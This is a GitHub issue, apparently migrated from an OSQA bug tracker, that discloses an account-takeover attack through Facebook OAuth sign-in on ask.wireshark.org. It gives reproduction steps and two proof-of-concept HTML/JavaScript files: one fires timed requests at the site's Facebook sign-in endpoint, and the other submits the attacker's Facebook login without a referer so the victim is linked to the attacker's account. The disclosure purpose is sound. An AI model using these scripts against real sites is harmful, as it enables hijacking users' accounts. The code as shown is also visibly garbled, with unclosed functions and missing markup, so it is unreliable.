[OSQA-954] Account takeover using facebook OAuth #503

javierder opened this Issue May 13, 2015 · 0 comments


None yet

1 participant


[reporter="d3xt0r", created="Thu, 28 Aug 2014 08:41:28 -0400"]
Hey !!

Its me Daksh Patel here ! I would like to report Account takeover using facebook OAuth. I tested this on wireshark . (https://ask.wireshark.org/account/signin/)

Steps to reproduce :

  1. First allow any app to your facebook account like i tested on wireshark.

2) Now open your account and use this files . open this test.html file and it ll call the fb_login.html file and bang !! This ll add the attackers facebook account in victim.

Save the test.html and fb_login.html

I) test.html contains the the auth link to facebook . First open this file :


   <script type="text/javascript">
  function fb_login() {
    return (window.open("./fb_login.html", "_blank",
   function hi_addlogin() {

   function pwn() {
     win1 = fb_login();
     setTimeout("hi_addlogin()", 7000);
     win2 = agree();
     setTimeout("fb_login()", 7000);
     action="https://ask.wireshark.org/account/facebook/signin/" method="GET">

II) fb_login file contains the facebook login . Change the email and password in this file .

   <script type="text/javascript">
  function post_without_referer() {
    // POST request, WebKit & Firefox. Data, meta & form submit trinity
   location = 'data:text/html,https://www.facebook.com/login.php?login_attempt=1\'>' +
              '' +
              '' +
              '' +

//change the email and password.

//to get victim logged in attacker's account

Lemme know if you need any help .

Daksh Patel
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment